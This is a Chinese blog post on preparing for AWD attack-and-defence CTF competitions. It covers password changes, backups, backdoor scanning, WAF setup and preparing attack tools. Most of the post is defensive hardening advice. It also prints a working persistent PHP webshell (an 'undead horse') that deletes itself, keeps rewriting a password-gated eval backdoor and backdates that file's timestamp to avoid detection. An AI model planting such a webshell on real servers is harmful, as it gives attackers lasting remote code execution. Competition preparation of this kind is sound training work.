AWD比赛的前期准备

最新推荐文章于 2024-04-26 14:49:48 发布
最新推荐文章于 2024-04-26 14:49:48 发布
阅读量277 收藏 2
点赞数
分类专栏: 渗透测试 文章标签: CTF AWD 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41217671/article/details/131662630
版权
1.改密码

之前参加强网杯,主办方给每个选手靶机ssh密码是一串md5密码,大家以为是随机密码,导致很多选手没改密码,结果大家都是相同的md5密码。

  • 修改ssh密码,即账号密码

sudo passwd user//修改账号密码sudoservice sshd restart //重启ssh服务,让密码即刻生效

  • 修改数据库密码

mysql 密码修改mysql> SET PASSWORD FOR 'user'@'localhost' = PASSWORD('newpass');

  • 修改web应用/网站管理员密码
    先到数据库看下密码,到时也能尝试默认密码登录对手的应用,修改数据库密码,或者
2.备份
  • 备份源码

tar -zcvf www.tar.gz/var/www/ 备份压缩源码tar -zcf /tmp/www.tar.gz/var/www/ 备份压缩到tmp目录去解压tar -zxvf www.tar.gz

  • 备份数据库

3.删除后门,修补漏洞

用d盾扫描源码,看看有没有隐藏的后门shell

用代码审计工具如Seay源代码审计系统 对代码进行审计看有无明显的漏洞

4.上waf,加固

waf可以安全狗,安全狗有两个版本,一个网站安全狗,可以对网站进行防护,cc攻击,sql注入,木马上传等,另一个是服务器安全狗,可以防止被提权,加固系统等

此处为语雀内容卡片,点击链接查看:Llinux网站安全狗安装方法 · 语雀

require_once('waf.php') 在公共配置文件添加,达到整站防注

安全狗安装

此处为语雀内容卡片,点击链接查看:Llinux网站安全狗安装方法 · 语雀

5.准备不死马,提权脚本

不死马

<?phpignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = '2.php';
$code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>';
while(1){
file_put_contents($file,$code);
system('touch -m -d "2018-12-01 09:10:12" .2.php');
usleep(5000);
}
?>

6.tips

1.防火墙

2.主机发现,

3.流量,文件监控

4.日志分析

 

^嘟_^
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
AWD比赛后门通用脚本
10-31
AWD比赛后门通用脚本 改一下IP和密码就好 适用于AWD混战
CTF AWD比赛工具收集.zip
09-30
比赛项目源码
红蓝对抗-AWD全流程攻略01(起手准备工作)
最新发布
m0_67189356的博客
04-26 1288
AWDP对抗比赛攻略:防御阶段、混战阶段所涉及到的各类知识点。
CTF线下赛AWD知识点【持续完善ing】
leekos的博客,分享web安全相关知识~
07-28 1280
即攻防对抗,比赛中每个队伍维护多台服务器(一般两三台,视小组参赛人数而定),服务器中存在多个漏洞(web层、系统层、中间件层等),利用漏洞攻击其他队伍可以进行得分,加固时间段可自行发现漏洞对服务器进行加固,避免被其他队伍攻击失分。在AWD中,一般都需要专门防御加固自己服务器的环节,但加固的很多操作都会涉及到root权限,如果直接给root权限最好,但一般只会给一个普通权限账号,这时候往往就需要给服务器提权了。,可以利用脚本发生大量垃圾数据包,混淆视觉,给对方人员增加检测的难度,浪费对方的时间。
AWD比赛入门攻略总结
鹿鸣天涯
09-28 4324
AWD比赛入门攻略总结
AWD基本步骤
qq_41672971的博客
12-07 1323
11111
AWD常见防御加固手段
Welcome To Myon'Blog !
10-06 1891
一、加固用户名密码(用户层) 1、修改linux用户密码 2、删除其他可登录用户 二、加固SQL数据库(服务层) 1、修改mysql密码 2、删除匿名用户 3、刷新配置 4、改网站后台密码 三、后门文件查杀 四、关闭shell连接进程 五、处理新增文件与不死马 1、查看新增文件,删掉 2、删除不死马(rm -f 无法删除) (1)创建一个脚本 (2)加权777(最高权限) (3)在后台不断运行该脚本 六、弱口令与内核溢出提权
CTF-AWD
weixin_45042115的博客
10-04 4208
CTF-AWD AWD (Attack With Defence),比赛中每个队伍维护多台服务器,服务器中存在多个漏洞,利用漏洞攻击其他队伍可以进行得分,修复漏洞可以避免被其他队伍攻击失分。简而言之就是你既是一个hacker,又是一个manager。 必备操作: 备份网站文件 修改数据库默认密码 修改网页登陆端一切弱密码 查看是否留有后门账户 关闭不必要端口,如远程登陆端口 使用命令匹配一句话特性 关注是否运行了“特殊”进程 权限高可以设置防火墙或者禁止他人修改本目录 防御 ssh远程登录 一、口令登录 口
AWD攻防模式
静水流深,沧笙踏歌
05-10 9165
看了很多篇文章,要注意的事情太多了,只打过很不正规的小型awd,不算真正的awd,感觉真正的awd要被打爆哈哈,慢慢来吧。先写个大致框架。 1.修改ssh密码,看看能不能登陆别人的。 2.dump源码 3.备份数据库,修改数据库密码 4.D盾查杀 5.找漏洞,代码审计(可用工具seay 6.上监控脚本,日志分析 7.关闭不必要的端口 8.webshell,维权 9.不死马杀进程,重启服务器 10....
AWD攻防学习
H4ppyD0g的博客
12-11 1250
文章目录 AW攻防步骤 1-源码备份,修改口令 修改ssh密码passwd 打包目录tar -zcvf file.tar.gz directory_to_compress 解包tar -zxvf file.tar.gz 从服务器下载文件scp [-p port ]jgc@192.168.28.151:/home/jgc/a.txt b.txt 上传到服务器scp b.txt jgc@192.168.28.151:/home/jgc/b.txt 2-部署各个环境的WAF(比赛规则) 3-扫描源码中预留或隐藏后
AWD攻防比赛 webshell
04-01
webshell,通过网页获取主机资源
AWD比赛各类必备脚本
07-09
网络安全领域,特别是AWD(Attack and Defense,攻防演练)比赛中,参赛队伍需要具备一系列技术技能,包括网络渗透、防御策略以及应急响应等。"AWD比赛各类必备脚本"是一个集合,其中包含了多种实用工具,帮助参赛...
awd网络攻防比赛平台.zip
08-24
全国大学生电子设计竞赛(National Undergraduate Electronics Design Contest),试题,解决方案及源码。计划或参加电赛的同学可以用来学习提升和参考。程序均是实战案例,经过测试可直接运行。...
awd比赛用到的脚本.zip
08-24
全国大学生电子设计竞赛(National Undergraduate Electronics Design Contest),试题,解决方案及源码。计划或参加电赛的同学可以用来学习提升和参考。程序均是实战案例,经过测试可直接运行。...
AWD比赛常规套路
鹿鸣天涯
09-26 515
AWD比赛常规套路
awd比赛笔记
q2412322029的博客
06-17 543
awd主要题型为WEB和PWN,涉及语言多数为PHP,还有少量Java、Python。WEB主要是一些CMS和框架安全漏洞,如注入、上传和反序列化等,更多是依赖已知漏洞。
awd初级思路
weixin_44255856的博客
09-09 3671
网络拓扑 ssh复制到电脑上 修改 ssh密码 数据库密码 ssh密码修改:sudo passwd user mysql密码修改: set password for 'user'@'localhost' = password('newpass'); 备网站源码 数据库 备份网站源码 使用Winscp等工具下载var/www/html下的文件,备份 tar -zcvf web.tar.gz /v...
ctfAWD(1)_ssh弱口令
余韵
09-16 2165
ctfAWD(1) ssh弱口令 批量修改ssh初始密码 要点 passwd的--stdin参数ubuntu不支持,chpasswd命令需要root权限 echo "root" |passwd --stdin apache 更改密码用sh -c passwd命令,不直接用passwd 控制初始登录ssh的欢迎banner 控制收发包速度和 CRLF ,通过jupyter快速调试 git...
Linux下修改ssh登录密码
热门推荐
Mister_yang的博客
07-20 1万+
文章目录三、修改linux的ssh登录密码1. 改修登录密码2.修改密码失败原因3.修改权限后修改登录密码 三、修改linux的ssh登录密码 1. 改修登录密码 如果权限没有问题的话那么直接修改ssh密码只要密码匹配就可以修改成功;如果权限修改失败,请参考步骤2,3 [root@8 ~]# passwd Changing password for user root. New password: Retype new password: passwd: Authentication token m
基于Docker的AWD比赛平台
04-04
Docker是一种轻量级的容器技术,可以让开发者将应用程序和相关组件打包成一个可移植的容器,使得应用程序可以在任何环境下运行,从而提高了应用程序的可移植性和可靠性。基于Docker的AWD比赛平台可以提供以下优势: 1. 环境一致性:Docker容器可以确保比赛中每个参赛者使用的环境都是相同的,避免了不同参赛者之间因环境差异导致的不公平竞争。 2. 快速部署:使用Docker容器可以快速部署比赛平台,并且可以在不同的服务器上运行多个容器,提高了比赛平台的可扩展性。 3. 安全性:Docker容器可以提供更高的安全性,比如可以限制容器的资源使用、网络访问等,避免了恶意参赛者的攻击。 4. 资源隔离:Docker容器可以提供资源隔离,每个参赛者都可以在自己的容器中运行自己的应用程序,避免了不同参赛者之间的干扰。 5. 管理方便:Docker容器可以通过命令行或者图形界面进行管理,方便管理员对比赛平台进行管理和维护。 基于Docker的AWD比赛平台可以提供更高的可靠性、可扩展性和安全性,是一种更加现代化的比赛平台架构。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值